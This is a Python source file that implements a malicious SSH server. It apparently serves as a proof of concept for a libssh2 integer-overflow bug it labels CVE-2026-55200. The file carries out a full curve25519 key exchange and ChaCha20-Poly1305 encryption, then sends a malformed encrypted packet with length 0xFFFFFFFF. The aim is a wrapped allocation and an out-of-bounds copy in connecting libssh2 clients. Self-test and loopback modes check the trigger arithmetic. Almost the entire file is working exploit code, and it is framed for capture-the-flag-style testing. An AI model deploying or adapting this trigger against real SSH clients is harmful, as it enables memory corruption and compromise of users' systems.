634 lines
23 KiB
Python
634 lines
23 KiB
Python
#!/usr/bin/env python3
|
|
import argparse
|
|
import hashlib
|
|
import os
|
|
import queue
|
|
import socket
|
|
import struct
|
|
import sys
|
|
import threading
|
|
import time
|
|
import traceback
|
|
from dataclasses import dataclass
|
|
|
|
from cryptography.hazmat.primitives import hashes, serialization
|
|
from cryptography.hazmat.primitives.asymmetric import padding, rsa, x25519
|
|
|
|
|
|
HOST = ""
|
|
PORT = 0
|
|
|
|
SERVER_IDENT = b"SSH-2.0-libpwn-cve-2026-55200"
|
|
LIBSSH2_PACKET_MAXPAYLOAD = 35000
|
|
DEFAULT_PACKET_LENGTH = 0xFFFFFFFF
|
|
DEFAULT_AUTH_LEN = 16
|
|
DEFAULT_MAC_LEN = 0
|
|
CLIENT_IDENT = b"SSH-2.0-libpwn-local-libssh2-mock"
|
|
|
|
KEX_ALGORITHMS = [
|
|
"curve25519-sha256",
|
|
"curve25519-sha256@libssh.org",
|
|
]
|
|
HOSTKEY_ALGORITHMS = [
|
|
"rsa-sha2-256",
|
|
"ssh-rsa",
|
|
]
|
|
CIPHER_ALGORITHMS = [
|
|
"chacha20-poly1305@openssh.com",
|
|
]
|
|
MAC_ALGORITHMS = [
|
|
"hmac-sha2-256",
|
|
"hmac-sha1",
|
|
]
|
|
COMP_ALGORITHMS = [
|
|
"none",
|
|
]
|
|
|
|
|
|
def u32(value):
|
|
return struct.pack(">I", value & 0xFFFFFFFF)
|
|
|
|
|
|
def read_exact(sock, size):
|
|
out = bytearray()
|
|
while len(out) < size:
|
|
chunk = sock.recv(size - len(out))
|
|
if not chunk:
|
|
raise EOFError("connection closed while reading")
|
|
out += chunk
|
|
return bytes(out)
|
|
|
|
|
|
def ssh_string(data):
|
|
if isinstance(data, str):
|
|
data = data.encode()
|
|
return u32(len(data)) + data
|
|
|
|
|
|
def ssh_name_list(items):
|
|
return ssh_string(",".join(items).encode())
|
|
|
|
|
|
def mpint_bytes(value):
|
|
if value == 0:
|
|
return b""
|
|
raw = value.to_bytes((value.bit_length() + 7) // 8, "big")
|
|
if raw[0] & 0x80:
|
|
raw = b"\x00" + raw
|
|
return raw
|
|
|
|
|
|
def ssh_mpint(value):
|
|
return ssh_string(mpint_bytes(value))
|
|
|
|
|
|
def read_ssh_string(buf, offset):
|
|
if offset + 4 > len(buf):
|
|
raise ValueError("short SSH string length")
|
|
size = struct.unpack(">I", buf[offset:offset + 4])[0]
|
|
offset += 4
|
|
if offset + size > len(buf):
|
|
raise ValueError("short SSH string body")
|
|
return buf[offset:offset + size], offset + size
|
|
|
|
|
|
def split_namelist(raw):
|
|
if not raw:
|
|
return []
|
|
return raw.decode(errors="strict").split(",")
|
|
|
|
|
|
def first_match(client_items, server_items, label):
|
|
for item in client_items:
|
|
if item in server_items:
|
|
return item
|
|
raise RuntimeError(f"client did not offer required {label}; got {client_items!r}")
|
|
|
|
|
|
def build_plain_packet(payload, block_size=8):
|
|
padding_len = (-(len(payload) + 5)) % block_size
|
|
if padding_len < 4:
|
|
padding_len += block_size
|
|
packet_length = len(payload) + 1 + padding_len
|
|
return u32(packet_length) + bytes([padding_len]) + payload + os.urandom(padding_len)
|
|
|
|
|
|
def parse_plain_packet(packet):
|
|
if len(packet) < 5:
|
|
raise ValueError("plain packet too short")
|
|
packet_length = struct.unpack(">I", packet[:4])[0]
|
|
padding_len = packet[4]
|
|
if packet_length + 4 != len(packet):
|
|
raise ValueError("packet length mismatch")
|
|
if padding_len + 1 > packet_length:
|
|
raise ValueError("invalid padding length")
|
|
return packet[5:4 + packet_length - padding_len]
|
|
|
|
|
|
def read_plain_packet(sock, max_packet=1024 * 1024):
|
|
packet_length = struct.unpack(">I", read_exact(sock, 4))[0]
|
|
if packet_length < 1 or packet_length > max_packet:
|
|
raise ValueError(f"refusing plain packet_length={packet_length}")
|
|
body = read_exact(sock, packet_length)
|
|
return parse_plain_packet(u32(packet_length) + body)
|
|
|
|
|
|
def send_plain_packet(sock, payload):
|
|
sock.sendall(build_plain_packet(payload))
|
|
|
|
|
|
def read_ident(sock):
|
|
buf = bytearray()
|
|
while True:
|
|
ch = read_exact(sock, 1)
|
|
if ch == b"\n":
|
|
line = bytes(buf).rstrip(b"\r")
|
|
if line.startswith(b"SSH-"):
|
|
return line
|
|
buf.clear()
|
|
continue
|
|
buf += ch
|
|
if len(buf) > 4096:
|
|
raise ValueError("SSH banner line too long")
|
|
|
|
|
|
def build_kexinit_payload():
|
|
payload = bytearray()
|
|
payload.append(20)
|
|
payload += os.urandom(16)
|
|
payload += ssh_name_list(KEX_ALGORITHMS)
|
|
payload += ssh_name_list(HOSTKEY_ALGORITHMS)
|
|
payload += ssh_name_list(CIPHER_ALGORITHMS)
|
|
payload += ssh_name_list(CIPHER_ALGORITHMS)
|
|
payload += ssh_name_list(MAC_ALGORITHMS)
|
|
payload += ssh_name_list(MAC_ALGORITHMS)
|
|
payload += ssh_name_list(COMP_ALGORITHMS)
|
|
payload += ssh_name_list(COMP_ALGORITHMS)
|
|
payload += ssh_string(b"")
|
|
payload += ssh_string(b"")
|
|
payload += b"\x00"
|
|
payload += u32(0)
|
|
return bytes(payload)
|
|
|
|
|
|
def parse_kexinit_payload(payload):
|
|
if not payload or payload[0] != 20:
|
|
raise ValueError("expected SSH_MSG_KEXINIT")
|
|
offset = 17
|
|
names = []
|
|
for _ in range(10):
|
|
raw, offset = read_ssh_string(payload, offset)
|
|
names.append(split_namelist(raw))
|
|
return {
|
|
"kex": names[0],
|
|
"hostkey": names[1],
|
|
"c2s_cipher": names[2],
|
|
"s2c_cipher": names[3],
|
|
"c2s_mac": names[4],
|
|
"s2c_mac": names[5],
|
|
"c2s_comp": names[6],
|
|
"s2c_comp": names[7],
|
|
}
|
|
|
|
|
|
def rsa_public_blob(private_key, algorithm):
|
|
numbers = private_key.public_key().public_numbers()
|
|
return (
|
|
ssh_string(algorithm)
|
|
+ ssh_string(mpint_bytes(numbers.e))
|
|
+ ssh_string(mpint_bytes(numbers.n))
|
|
)
|
|
|
|
|
|
def sign_exchange_hash(private_key, hostkey_algorithm, exchange_hash):
|
|
if hostkey_algorithm == "rsa-sha2-256":
|
|
digest = hashes.SHA256()
|
|
elif hostkey_algorithm == "ssh-rsa":
|
|
digest = hashes.SHA1()
|
|
else:
|
|
raise ValueError(f"unsupported hostkey signature algorithm {hostkey_algorithm}")
|
|
sig = private_key.sign(exchange_hash, padding.PKCS1v15(), digest)
|
|
return ssh_string(hostkey_algorithm) + ssh_string(sig)
|
|
|
|
|
|
def exchange_hash(client_ident, server_ident, client_kexinit, server_kexinit,
|
|
hostkey_blob, client_pub, server_pub, shared_int):
|
|
h = bytearray()
|
|
h += ssh_string(client_ident)
|
|
h += ssh_string(server_ident)
|
|
h += ssh_string(client_kexinit)
|
|
h += ssh_string(server_kexinit)
|
|
h += ssh_string(hostkey_blob)
|
|
h += ssh_string(client_pub)
|
|
h += ssh_string(server_pub)
|
|
h += ssh_mpint(shared_int)
|
|
return hashlib.sha256(bytes(h)).digest()
|
|
|
|
|
|
def derive_key(shared_int, exchange_hash_value, session_id, letter, length):
|
|
seed = ssh_mpint(shared_int) + exchange_hash_value + letter + session_id
|
|
out = hashlib.sha256(seed).digest()
|
|
while len(out) < length:
|
|
out += hashlib.sha256(ssh_mpint(shared_int) + exchange_hash_value + out).digest()
|
|
return out[:length]
|
|
|
|
|
|
def rotl32(value, shift):
|
|
return ((value << shift) & 0xFFFFFFFF) | (value >> (32 - shift))
|
|
|
|
|
|
def quarter_round(state, a, b, c, d):
|
|
state[a] = (state[a] + state[b]) & 0xFFFFFFFF
|
|
state[d] = rotl32(state[d] ^ state[a], 16)
|
|
state[c] = (state[c] + state[d]) & 0xFFFFFFFF
|
|
state[b] = rotl32(state[b] ^ state[c], 12)
|
|
state[a] = (state[a] + state[b]) & 0xFFFFFFFF
|
|
state[d] = rotl32(state[d] ^ state[a], 8)
|
|
state[c] = (state[c] + state[d]) & 0xFFFFFFFF
|
|
state[b] = rotl32(state[b] ^ state[c], 7)
|
|
|
|
|
|
def chacha20_block(key, counter, nonce8):
|
|
constants = b"expand 32-byte k"
|
|
state = [
|
|
int.from_bytes(constants[i:i + 4], "little") for i in range(0, 16, 4)
|
|
]
|
|
state += [
|
|
int.from_bytes(key[i:i + 4], "little") for i in range(0, 32, 4)
|
|
]
|
|
state += [
|
|
counter & 0xFFFFFFFF,
|
|
(counter >> 32) & 0xFFFFFFFF,
|
|
int.from_bytes(nonce8[:4], "little"),
|
|
int.from_bytes(nonce8[4:], "little"),
|
|
]
|
|
working = state[:]
|
|
for _ in range(10):
|
|
quarter_round(working, 0, 4, 8, 12)
|
|
quarter_round(working, 1, 5, 9, 13)
|
|
quarter_round(working, 2, 6, 10, 14)
|
|
quarter_round(working, 3, 7, 11, 15)
|
|
quarter_round(working, 0, 5, 10, 15)
|
|
quarter_round(working, 1, 6, 11, 12)
|
|
quarter_round(working, 2, 7, 8, 13)
|
|
quarter_round(working, 3, 4, 9, 14)
|
|
return b"".join(
|
|
((working[i] + state[i]) & 0xFFFFFFFF).to_bytes(4, "little")
|
|
for i in range(16)
|
|
)
|
|
|
|
|
|
def chacha20_xor(key, counter, nonce8, data):
|
|
out = bytearray()
|
|
block_counter = counter
|
|
for offset in range(0, len(data), 64):
|
|
stream = chacha20_block(key, block_counter, nonce8)
|
|
chunk = data[offset:offset + 64]
|
|
out += bytes(a ^ b for a, b in zip(chunk, stream))
|
|
block_counter = (block_counter + 1) & 0xFFFFFFFFFFFFFFFF
|
|
return bytes(out)
|
|
|
|
|
|
def poly1305_mac(message, key):
|
|
r = int.from_bytes(key[:16], "little")
|
|
r &= 0x0FFFFFFC0FFFFFFC0FFFFFFC0FFFFFFF
|
|
s = int.from_bytes(key[16:], "little")
|
|
p = (1 << 130) - 5
|
|
acc = 0
|
|
for offset in range(0, len(message), 16):
|
|
block = message[offset:offset + 16]
|
|
n = int.from_bytes(block + b"\x01", "little")
|
|
acc = ((acc + n) * r) % p
|
|
return ((acc + s) & ((1 << 128) - 1)).to_bytes(16, "little")
|
|
|
|
|
|
def chachapoly_encrypt(key64, seqno, plaintext_without_tag):
|
|
if len(key64) != 64:
|
|
raise ValueError("chacha20-poly1305@openssh.com requires a 64-byte key")
|
|
if len(plaintext_without_tag) < 4:
|
|
raise ValueError("packet needs a 4-byte SSH packet_length")
|
|
seq = seqno.to_bytes(8, "big")
|
|
main_key = key64[:32]
|
|
header_key = key64[32:]
|
|
encrypted_len = chacha20_xor(header_key, 0, seq, plaintext_without_tag[:4])
|
|
encrypted_body = chacha20_xor(main_key, 1, seq, plaintext_without_tag[4:])
|
|
encrypted = encrypted_len + encrypted_body
|
|
poly_key = chacha20_xor(main_key, 0, seq, b"\x00" * 64)[:32]
|
|
return encrypted + poly1305_mac(encrypted, poly_key)
|
|
|
|
|
|
def chachapoly_decrypt(key64, seqno, encrypted_with_tag):
|
|
if len(encrypted_with_tag) < 20:
|
|
raise ValueError("encrypted packet too short")
|
|
seq = seqno.to_bytes(8, "big")
|
|
main_key = key64[:32]
|
|
header_key = key64[32:]
|
|
encrypted = encrypted_with_tag[:-16]
|
|
tag = encrypted_with_tag[-16:]
|
|
poly_key = chacha20_xor(main_key, 0, seq, b"\x00" * 64)[:32]
|
|
expected = poly1305_mac(encrypted, poly_key)
|
|
if expected != tag:
|
|
raise ValueError("poly1305 tag mismatch")
|
|
packet_len = chacha20_xor(header_key, 0, seq, encrypted[:4])
|
|
body = chacha20_xor(main_key, 1, seq, encrypted[4:])
|
|
return packet_len + body
|
|
|
|
|
|
def build_malformed_plain(packet_length, body_len):
|
|
if body_len < 1:
|
|
raise ValueError("body_len must be at least 1 so padding_length exists")
|
|
return u32(packet_length) + bytes([4]) + b"A" * (body_len - 1)
|
|
|
|
|
|
def build_malformed_wire(key64, seqno, packet_length, body_len, filler_len):
|
|
plain = build_malformed_plain(packet_length, body_len)
|
|
return chachapoly_encrypt(key64, seqno, plain) + (b"B" * filler_len)
|
|
|
|
|
|
@dataclass
|
|
class ArithmeticResult:
|
|
accepted: bool
|
|
total32: int
|
|
allocation: int
|
|
fixed_rejects: bool
|
|
fullpacket_copy_len: int
|
|
gap: int
|
|
|
|
|
|
def model_vulnerable_c_expression(packet_length, mac_len=DEFAULT_MAC_LEN, auth_len=DEFAULT_AUTH_LEN):
|
|
rhs32 = (packet_length + mac_len + auth_len) & 0xFFFFFFFF
|
|
total32 = (4 + rhs32) & 0xFFFFFFFF
|
|
accepted = packet_length >= 1 and 0 < total32 <= LIBSSH2_PACKET_MAXPAYLOAD
|
|
fixed_rejects = packet_length > LIBSSH2_PACKET_MAXPAYLOAD
|
|
copy_len = (packet_length - 1) & 0xFFFFFFFF
|
|
gap = copy_len - total32 if accepted and copy_len > total32 else 0
|
|
return ArithmeticResult(accepted, total32, total32 if accepted else 0,
|
|
fixed_rejects, copy_len, gap)
|
|
|
|
|
|
def model_vulnerable32(packet_length, mac_len=DEFAULT_MAC_LEN, auth_len=DEFAULT_AUTH_LEN):
|
|
total32 = (4 + packet_length + mac_len + auth_len) & 0xFFFFFFFF
|
|
accepted = packet_length >= 1 and 0 < total32 <= LIBSSH2_PACKET_MAXPAYLOAD
|
|
fixed_rejects = packet_length > LIBSSH2_PACKET_MAXPAYLOAD
|
|
copy_len = (packet_length - 1) & 0xFFFFFFFF
|
|
gap = copy_len - total32 if accepted and copy_len > total32 else 0
|
|
return ArithmeticResult(accepted, total32, total32 if accepted else 0,
|
|
fixed_rejects, copy_len, gap)
|
|
|
|
|
|
class MiniSSHExploitServer:
|
|
def __init__(self, args):
|
|
self.args = args
|
|
self.host_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
|
|
|
|
def serve_once(self):
|
|
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
|
|
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
|
listener.bind((self.args.listen_host, self.args.listen_port))
|
|
listener.listen(1)
|
|
actual_host, actual_port = listener.getsockname()
|
|
print(f"[+] listening on {actual_host}:{actual_port}")
|
|
conn, addr = listener.accept()
|
|
with conn:
|
|
conn.settimeout(self.args.timeout)
|
|
print(f"[+] client connected from {addr[0]}:{addr[1]}")
|
|
self.handle_client(conn)
|
|
|
|
def handle_client(self, conn):
|
|
seq_out = 0
|
|
seq_in = 0
|
|
|
|
conn.sendall(SERVER_IDENT + b"\r\n")
|
|
client_ident = read_ident(conn)
|
|
print(f"[+] client ident: {client_ident.decode(errors='replace')}")
|
|
|
|
client_kexinit = read_plain_packet(conn)
|
|
seq_in += 1
|
|
client_lists = parse_kexinit_payload(client_kexinit)
|
|
|
|
chosen_kex = first_match(client_lists["kex"], KEX_ALGORITHMS, "kex")
|
|
chosen_hostkey = first_match(client_lists["hostkey"], HOSTKEY_ALGORITHMS, "hostkey")
|
|
first_match(client_lists["s2c_cipher"], CIPHER_ALGORITHMS, "server-to-client cipher")
|
|
first_match(client_lists["c2s_cipher"], CIPHER_ALGORITHMS, "client-to-server cipher")
|
|
first_match(client_lists["s2c_mac"], MAC_ALGORITHMS, "server-to-client mac")
|
|
first_match(client_lists["c2s_mac"], MAC_ALGORITHMS, "client-to-server mac")
|
|
first_match(client_lists["s2c_comp"], COMP_ALGORITHMS, "server-to-client compression")
|
|
first_match(client_lists["c2s_comp"], COMP_ALGORITHMS, "client-to-server compression")
|
|
print(f"[+] negotiated {chosen_kex} / {chosen_hostkey} / chacha20-poly1305@openssh.com")
|
|
|
|
server_kexinit = build_kexinit_payload()
|
|
send_plain_packet(conn, server_kexinit)
|
|
seq_out += 1
|
|
|
|
init_payload = read_plain_packet(conn)
|
|
seq_in += 1
|
|
if not init_payload or init_payload[0] != 30:
|
|
raise RuntimeError(f"expected SSH_MSG_KEX_ECDH_INIT, got {init_payload[:1]!r}")
|
|
client_pub, offset = read_ssh_string(init_payload, 1)
|
|
if offset != len(init_payload) or len(client_pub) != 32:
|
|
raise RuntimeError("invalid curve25519 client public key")
|
|
|
|
server_private = x25519.X25519PrivateKey.generate()
|
|
server_pub = server_private.public_key().public_bytes(
|
|
serialization.Encoding.Raw,
|
|
serialization.PublicFormat.Raw,
|
|
)
|
|
shared = server_private.exchange(x25519.X25519PublicKey.from_public_bytes(client_pub))
|
|
if shared == b"\x00" * 32:
|
|
raise RuntimeError("invalid all-zero curve25519 shared secret")
|
|
shared_int = int.from_bytes(shared, "big")
|
|
|
|
hostkey_blob = rsa_public_blob(self.host_key, chosen_hostkey)
|
|
h = exchange_hash(client_ident, SERVER_IDENT, client_kexinit, server_kexinit,
|
|
hostkey_blob, client_pub, server_pub, shared_int)
|
|
session_id = h
|
|
signature = sign_exchange_hash(self.host_key, chosen_hostkey, h)
|
|
|
|
reply = b"\x1f" + ssh_string(hostkey_blob) + ssh_string(server_pub) + ssh_string(signature)
|
|
send_plain_packet(conn, reply)
|
|
seq_out += 1
|
|
|
|
send_plain_packet(conn, b"\x15")
|
|
seq_out += 1
|
|
print("[+] sent SSH_MSG_NEWKEYS")
|
|
|
|
try:
|
|
newkeys = read_plain_packet(conn)
|
|
seq_in += 1
|
|
if newkeys != b"\x15":
|
|
print(f"[!] expected client NEWKEYS, got {newkeys[:1]!r}; continuing")
|
|
else:
|
|
print("[+] received client SSH_MSG_NEWKEYS")
|
|
except Exception as exc:
|
|
print(f"[!] did not read client NEWKEYS before trigger: {exc}")
|
|
|
|
key_s2c = derive_key(shared_int, h, session_id, b"D", 64)
|
|
trigger_seq = seq_out
|
|
wire = build_malformed_wire(
|
|
key_s2c,
|
|
trigger_seq,
|
|
self.args.packet_length,
|
|
self.args.body_len,
|
|
self.args.filler_len,
|
|
)
|
|
conn.sendall(wire)
|
|
print(f"[+] sent malformed chacha/poly1305 trigger at server seq={trigger_seq}")
|
|
print(f"[+] trigger bytes={len(wire)} packet_length=0x{self.args.packet_length:08x}")
|
|
time.sleep(self.args.hold_open)
|
|
|
|
|
|
def self_test(args):
|
|
key = bytes(range(64))
|
|
seqno = 3
|
|
wire = build_malformed_wire(key, seqno, args.packet_length, args.body_len, args.filler_len)
|
|
encrypted_part = wire[:-args.filler_len] if args.filler_len else wire
|
|
decrypted = chachapoly_decrypt(key, seqno, encrypted_part)
|
|
decoded_len = struct.unpack(">I", decrypted[:4])[0]
|
|
arith = model_vulnerable_c_expression(args.packet_length, DEFAULT_MAC_LEN, DEFAULT_AUTH_LEN)
|
|
|
|
print("[self-test] chacha20-poly1305@openssh.com packet generator")
|
|
print(f"packet_length=0x{decoded_len:08x} ({decoded_len})")
|
|
print(f"encrypted_fragment_len={len(encrypted_part)}")
|
|
print(f"filler_len={args.filler_len}")
|
|
print(f"body_len={args.body_len}")
|
|
print(f"vulnerable_c_expression_accepted={arith.accepted}")
|
|
print(f"vulnerable_c_expression_allocation={arith.allocation}")
|
|
print(f"fixed_rejects={arith.fixed_rejects}")
|
|
print(f"fullpacket_style_length={arith.fullpacket_copy_len}")
|
|
print(f"allocation_gap={arith.gap}")
|
|
|
|
if decoded_len != args.packet_length:
|
|
raise SystemExit("[self-test] FAIL: decrypted packet_length mismatch")
|
|
if not arith.accepted or arith.allocation != 19:
|
|
raise SystemExit("[self-test] FAIL: arithmetic did not reach wrapped allocation=19")
|
|
if not arith.fixed_rejects:
|
|
raise SystemExit("[self-test] FAIL: fixed model did not reject oversized length")
|
|
print("[self-test] PASS")
|
|
|
|
|
|
def loopback_client(client_sock, args):
|
|
client_sock.settimeout(args.timeout)
|
|
server_ident = read_ident(client_sock)
|
|
if server_ident != SERVER_IDENT:
|
|
raise RuntimeError(f"unexpected server ident {server_ident!r}")
|
|
client_sock.sendall(CLIENT_IDENT + b"\r\n")
|
|
|
|
client_kexinit = build_kexinit_payload()
|
|
send_plain_packet(client_sock, client_kexinit)
|
|
|
|
server_kexinit = read_plain_packet(client_sock)
|
|
server_lists = parse_kexinit_payload(server_kexinit)
|
|
first_match(server_lists["kex"], KEX_ALGORITHMS, "server kex")
|
|
first_match(server_lists["hostkey"], HOSTKEY_ALGORITHMS, "server hostkey")
|
|
first_match(server_lists["s2c_cipher"], CIPHER_ALGORITHMS, "server cipher")
|
|
|
|
client_private = x25519.X25519PrivateKey.generate()
|
|
client_pub = client_private.public_key().public_bytes(
|
|
serialization.Encoding.Raw,
|
|
serialization.PublicFormat.Raw,
|
|
)
|
|
send_plain_packet(client_sock, b"\x1e" + ssh_string(client_pub))
|
|
|
|
reply = read_plain_packet(client_sock)
|
|
if not reply or reply[0] != 31:
|
|
raise RuntimeError(f"expected SSH_MSG_KEX_ECDH_REPLY, got {reply[:1]!r}")
|
|
hostkey_blob, offset = read_ssh_string(reply, 1)
|
|
server_pub, offset = read_ssh_string(reply, offset)
|
|
_signature, offset = read_ssh_string(reply, offset)
|
|
if offset != len(reply):
|
|
raise RuntimeError("trailing data in KEX_ECDH_REPLY")
|
|
|
|
shared = client_private.exchange(x25519.X25519PublicKey.from_public_bytes(server_pub))
|
|
shared_int = int.from_bytes(shared, "big")
|
|
h = exchange_hash(CLIENT_IDENT, SERVER_IDENT, client_kexinit, server_kexinit,
|
|
hostkey_blob, client_pub, server_pub, shared_int)
|
|
key_s2c = derive_key(shared_int, h, h, b"D", 64)
|
|
|
|
newkeys = read_plain_packet(client_sock)
|
|
if newkeys != b"\x15":
|
|
raise RuntimeError(f"expected server NEWKEYS, got {newkeys[:1]!r}")
|
|
send_plain_packet(client_sock, b"\x15")
|
|
|
|
encrypted_len = 4 + args.body_len + 16
|
|
encrypted = read_exact(client_sock, encrypted_len)
|
|
if args.filler_len:
|
|
read_exact(client_sock, args.filler_len)
|
|
decrypted = chachapoly_decrypt(key_s2c, 3, encrypted)
|
|
decoded_len = struct.unpack(">I", decrypted[:4])[0]
|
|
if decoded_len != args.packet_length:
|
|
raise RuntimeError("loopback decrypted packet_length mismatch")
|
|
return decoded_len, encrypted_len
|
|
|
|
|
|
def loopback_test(args):
|
|
left, right = socket.socketpair()
|
|
result_queue = queue.Queue()
|
|
|
|
def server_thread():
|
|
try:
|
|
with left:
|
|
left.settimeout(args.timeout)
|
|
MiniSSHExploitServer(args).handle_client(left)
|
|
result_queue.put(None)
|
|
except Exception as exc:
|
|
result_queue.put(exc)
|
|
|
|
thread = threading.Thread(target=server_thread, daemon=True)
|
|
thread.start()
|
|
try:
|
|
with right:
|
|
decoded_len, encrypted_len = loopback_client(right, args)
|
|
finally:
|
|
thread.join(args.timeout + args.hold_open + 1)
|
|
|
|
if thread.is_alive():
|
|
raise SystemExit("[loopback-test] FAIL: server thread did not exit")
|
|
server_error = result_queue.get_nowait()
|
|
if server_error is not None:
|
|
raise server_error
|
|
|
|
print("[loopback-test] minimal SSH handshake/key-derivation path")
|
|
print(f"decrypted_trigger_packet_length=0x{decoded_len:08x} ({decoded_len})")
|
|
print(f"encrypted_trigger_fragment_len={encrypted_len}")
|
|
print("[loopback-test] PASS")
|
|
|
|
|
|
def main():
|
|
parser = argparse.ArgumentParser(
|
|
description="Minimal malicious SSH server/trigger for HTB-style libssh2 CVE-2026-55200 testing."
|
|
)
|
|
parser.add_argument("--self-test", action="store_true", help="verify local packet crypto and CVE arithmetic")
|
|
parser.add_argument("--loopback-test", action="store_true", help="verify the local SSH handshake and encrypted trigger path")
|
|
parser.add_argument("--serve", action="store_true", help="listen for one libssh2 client and send the trigger")
|
|
parser.add_argument("--listen-host", default=HOST, help="listen IP/interface, e.g. 0.0.0.0")
|
|
parser.add_argument("--listen-port", type=int, default=PORT, help="listen port, e.g. 2222")
|
|
parser.add_argument("--packet-length", type=lambda x: int(x, 0), default=DEFAULT_PACKET_LENGTH)
|
|
parser.add_argument("--body-len", type=int, default=8, help="truncated encrypted body length after the 4-byte length field")
|
|
parser.add_argument("--filler-len", type=int, default=64, help="extra bytes after the valid encrypted fragment/tag")
|
|
parser.add_argument("--timeout", type=float, default=10.0)
|
|
parser.add_argument("--hold-open", type=float, default=1.0)
|
|
args = parser.parse_args()
|
|
|
|
if args.self_test:
|
|
self_test(args)
|
|
return
|
|
if args.loopback_test:
|
|
loopback_test(args)
|
|
return
|
|
if args.serve:
|
|
if not args.listen_host or not args.listen_port:
|
|
raise SystemExit("set --listen-host and --listen-port; the HOST/PORT section is intentionally open")
|
|
MiniSSHExploitServer(args).serve_once()
|
|
return
|
|
parser.print_help()
|
|
|
|
|
|
if __name__ == "__main__":
|
|
try:
|
|
main()
|
|
except KeyboardInterrupt:
|
|
raise
|
|
except Exception:
|
|
traceback.print_exc()
|
|
sys.exit(1)
|